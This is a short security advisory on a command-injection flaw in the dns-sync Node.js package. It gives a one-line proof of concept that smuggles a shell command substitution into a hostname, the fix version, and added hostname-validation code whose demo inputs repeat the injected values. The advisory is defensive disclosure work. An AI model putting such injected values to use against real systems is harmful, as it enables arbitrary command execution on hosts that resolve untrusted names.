Affected versions of dns-sync are vulnerable to arbitrary command execution via maliciously formed hostnames.
Proof of Concept
var dnsSync = require('dns-sync');
console.log(dnsSync.resolve('$(id > /tmp/foo)'));
Update to version 0.1.1 or later.
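The `$(...)` in the proof of concept is shell command substitution, so it only matters when a hostname reaches a shell. The following added example (not code from dns-sync or from this advisory) shows allow-list validation that a caller can apply to untrusted hostnames as defense in depth alongside the update; the names `hostnameProblem`, `guardResolver` and the stub resolver are hypothetical, and IPv6 literals and non-punycode internationalized names are out of scope and rejected.

```javascript
// Added example (not dns-sync code): allow-list validation of hostnames
// before they are handed to a resolver that may build a shell command.

// One DNS label per RFC 1123: letters, digits and hyphens, 1-63 characters,
// never starting or ending with a hyphen.
const LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

// Returns null when `name` is an acceptable hostname, otherwise a reason string.
function hostnameProblem(name) {
  if (typeof name !== 'string') return 'not a string';
  // A single trailing dot (fully qualified form) is legal; strip it first.
  const host = name.endsWith('.') ? name.slice(0, -1) : name;
  if (host.length === 0) return 'empty';
  if (host.length > 253) return 'longer than 253 characters';
  for (const label of host.split('.')) {
    if (!LABEL.test(label)) return 'invalid label: ' + JSON.stringify(label);
  }
  return null;
}

// Wraps any resolve(hostname) function (hypothetical parameter `resolve`)
// so that rejected input never reaches it.
function guardResolver(resolve) {
  return function guardedResolve(name) {
    const problem = hostnameProblem(name);
    if (problem !== null) {
      throw new TypeError('refusing to resolve hostname (' + problem + ')');
    }
    return resolve(name);
  };
}

// Constructed demonstration: a stub resolver records every value it receives.
function demo() {
  const seen = [];
  const stub = (h) => { seen.push(h); return '192.0.2.1'; }; // constructed answer
  const safeResolve = guardResolver(stub);
  const inputs = ['example.com', 'example.com.', '$(id > /tmp/foo)', 'a;b.example'];
  const results = inputs.map((input) => {
    try {
      return [input, safeResolve(input)];
    } catch (err) {
      return [input, err.message];
    }
  });
  return { seen, results };
}
```

Wrap the resolver once, for example `guardResolver(dnsSync.resolve)`, and call only the wrapped function with untrusted input.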
Advisory published: Apr 11th, 2017
Initial report by Steve Kemp: Oct 27th, 2016